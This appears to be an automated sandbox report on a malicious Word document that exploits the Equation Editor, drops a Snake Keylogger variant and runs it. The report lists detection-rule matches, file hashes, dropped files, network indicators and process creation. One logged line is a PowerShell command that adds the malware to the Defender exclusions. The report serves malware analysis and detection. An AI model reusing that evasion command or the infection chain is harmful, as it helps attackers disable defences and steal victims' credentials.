Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49179 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49184 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode
Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode

System Summary

Source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: millitingacy20306.exe PID: 3832, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: millitingacy20306.exe PID: 3952, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\millizxc[1].doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\193318D4.doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\millizxc.doc.url
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\txt on 66.63.187.123.url
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\millitingacy20306.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\H363BpKqz0MdVd7[1].exe
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process Stats: CPU usage > 49%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00669921 9_2_00669921
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00664F07 9_2_00664F07
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_00219191 10_2_00219191
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_0021D510 10_2_0021D510
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_0021E7D8 10_2_0021E7D8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_0021D948 10_2_0021D948
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_0021ED40 10_2_0021ED40
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_0021DE30 10_2_0021DE30
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003DE8A8 13_2_003DE8A8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003D40F8 13_2_003D40F8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003D3914 13_2_003D3914
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003D8100 13_2_003D8100
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003D4968 13_2_003D4968
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003D69B8 13_2_003D69B8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003D31B1 13_2_003D31B1
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003DB1B0 13_2_003DB1B0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003D99D3 13_2_003D99D3
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003D43C8 13_2_003D43C8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003D7490 13_2_003D7490
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003D3481 13_2_003D3481
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003D5D00 13_2_003D5D00
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003DDD50 13_2_003DDD50
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003D3E28 13_2_003D3E28
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003D4699 13_2_003D4699
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003D8EC2 13_2_003D8EC2
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003D87E0 13_2_003D87E0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003DF1D9 13_2_003DF1D9
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003D9A49 13_2_003D9A49
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003DE325 13_2_003DE325
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003DFB08 13_2_003DFB08
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003DE398 13_2_003DE398
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003DDD41 13_2_003DDD41
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003DED40 13_2_003DED40
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003DD5B8 13_2_003DD5B8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003DD5C8 13_2_003DD5C8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003DF670 13_2_003DF670
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F0040 13_2_005F0040
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F3240 13_2_005F3240
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F6440 13_2_005F6440
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F1C60 13_2_005F1C60
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F4E60 13_2_005F4E60
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F8060 13_2_005F8060
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F2C00 13_2_005F2C00
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F5E00 13_2_005F5E00
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F9000 13_2_005F9000
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F1620 13_2_005F1620
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F4820 13_2_005F4820
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F7A20 13_2_005F7A20
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F0CC0 13_2_005F0CC0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F3EC0 13_2_005F3EC0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F70C0 13_2_005F70C0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F44F0 13_2_005F44F0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F28E0 13_2_005F28E0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F5AE0 13_2_005F5AE0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F8CE0 13_2_005F8CE0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F8690 13_2_005F8690
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F0680 13_2_005F0680
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F3880 13_2_005F3880
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F6A80 13_2_005F6A80
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F22A0 13_2_005F22A0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F54A0 13_2_005F54A0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F86A0 13_2_005F86A0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F1940 13_2_005F1940
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F4B40 13_2_005F4B40
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F7D40 13_2_005F7D40
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F0360 13_2_005F0360
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F3560 13_2_005F3560
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F6760 13_2_005F6760
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F1300 13_2_005F1300
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F4500 13_2_005F4500
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F7700 13_2_005F7700
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F2F20 13_2_005F2F20
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F6120 13_2_005F6120
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F25C0 13_2_005F25C0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F57C0 13_2_005F57C0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F89C0 13_2_005F89C0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F2BF6 13_2_005F2BF6
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F0FE0 13_2_005F0FE0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F41E0 13_2_005F41E0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_005F73E0 13_2_005F73E0
Source: ~WRF{15013EC6-ED12-459C-8C4F-9B4A7E95BCBA}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: millitingacy20306.exe PID: 3832, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: millitingacy20306.exe PID: 3952, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\millizxc[1].doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\193318D4.doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: H363BpKqz0MdVd7[1].exe.9.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: millitingacy20306.exe.9.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, iMjZsLFxfxH3l8nvPC.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, iMjZsLFxfxH3l8nvPC.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, JMsQw4TYy6wBk4vgS3.cs Security API names: _0020.SetAccessControl
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, JMsQw4TYy6wBk4vgS3.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, JMsQw4TYy6wBk4vgS3.cs Security API names: _0020.AddAccessRule
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, JMsQw4TYy6wBk4vgS3.cs Security API names: _0020.SetAccessControl
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, JMsQw4TYy6wBk4vgS3.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, JMsQw4TYy6wBk4vgS3.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winDOC@8/22@28/8
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$25139776.docx.doc
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRA497.tmp
Source: 0225139776.docx.doc OLE indicator, Word Document stream: true
Source: ~WRF{15013EC6-ED12-459C-8C4F-9B4A7E95BCBA}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{15013EC6-ED12-459C-8C4F-9B4A7E95BCBA}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{15013EC6-ED12-459C-8C4F-9B4A7E95BCBA}.tmp.0.dr OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 0225139776.docx.doc ReversingLabs: Detection: 36%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\millitingacy20306.exe "C:\Users\user\AppData\Roaming\millitingacy20306.exe"
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe"
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process created: C:\Users\user\AppData\Roaming\millitingacy20306.exe "C:\Users\user\AppData\Roaming\millitingacy20306.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: secur32.dll
